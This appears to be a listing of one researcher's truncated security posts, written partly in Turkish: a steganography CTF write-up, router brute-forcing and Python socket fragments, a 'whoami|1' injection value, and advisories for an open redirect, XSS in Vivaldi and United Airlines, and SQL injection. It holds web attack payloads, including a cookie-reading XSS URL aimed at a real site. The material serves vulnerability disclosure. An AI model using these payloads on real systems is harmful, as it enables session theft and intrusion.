xsuperbug

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
  char buffer[1024];

xsuperbug

1-İlk olarak bazı online resim analiz uygulamalarında şansımı denedim. Buralardan bi sonuç çıkmadı. 

2-Ben de bu resmi google image de aramaya karar verdim. Resim bi çok farklı boyutta bulunmaktaydı (doğal olarak) ancak ben 400x475 olanı arıyodum. 

3-400x475 resmi bulduğumda şaşırmıştım. Çünkü onun adı da "tux.jpg" idi.

4-Resmin bulunduğu web sitesini* görüntülediğimde linux tabanlı bir steganografi uygulaması (steghide) ile içine txt dosyası gizlendiğini gördüm.

5-Sanal makinada kullandığım linuxa bu uygulamayı kurdum ve aynen ordaki parametreler ile çalıştırdım. 

xsuperbug

<!DOCTYPE html>
<html>

	<head>
		<meta charset="utf-8">
		<title>Bruteforce!</title>
	</head>
	<!-- http://www.tp-link.com/resources/simulator/TL-WR750N_V5.0/localiztion/str_menu.js -->
	<body onload="detectFirefox()">
		<h1>Bruteforcing TP-Link routers with JavaScript</h1>

xsuperbug

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import random
import time 
dosya = open("liste.txt","r")
ipAddress=[]
for i in dosya:
	ipAddr = i
	hexAllFfff = "18446744073709551615"

xsuperbug

whoami|1

xsuperbug

Zafiyet Hakkında
================
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
 
Proof of concept
================
https://sso.tpo.com/members/edit?success_url=//google.com

Zaman Çizelgesi

xsuperbug

Name : Active Content Blocking Bypass via Data URIs in Vivaldi Browser
Software : Vivaldi Browser 1.0.83.38 (Developer Build) stable
Vendor Homepage : http://www.vivaldi.net
Vulnerability Type : Cross-Site Scripting 
Researcher : Evren Yalçın <evren [at] superbug [dot] co> 

Description 
Vivaldi is a freeware web browser developed by Vivaldi Technologies, a company founded by former co-founder and CEO of Opera, Jon Stephenson von Tetzchner.The project's slogan is "A new browser for our friends", and the browser is aimed at hardcore technologists, heavy internet users, and previous Opera browser users disgruntled by Opera's transition from the Presto engine to Blink, which removed many popular features.

Details 

xsuperbug

Name : United Airlines XSS Vulnerability
Vendor Homepage : http://www.united.com
Vulnerability Type : Cross-Site Scripting 
Researcher : Evren Yalçın <evren [at] superbug [dot] co> 

Example PoC is as follows :

http://www.united.com/travel/checkin/start.aspx?SID=&sessionKey=0DA191E8-342A-4FBE-A511-21C8702546D4&gLanguage=0&pat=False&code=PNR_NOT_FOUND_BY_ETICKET_LAST_NAME"><svg/onload=confirm(document.cookie)>//&opt=ET&1=&2=&3=123123123&4=

----

xsuperbug

Name : PIHOME RaspberryPi - Home Automation
Vendor Homepage : http://pihome.harkemedia.de/
Vulnerability Type : Sql Injection
Researcher : Evren Yalçın <evren [at] superbug [dot] co> 

Details :

1- Sql Injection :

Source Code:

xsuperbug

<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o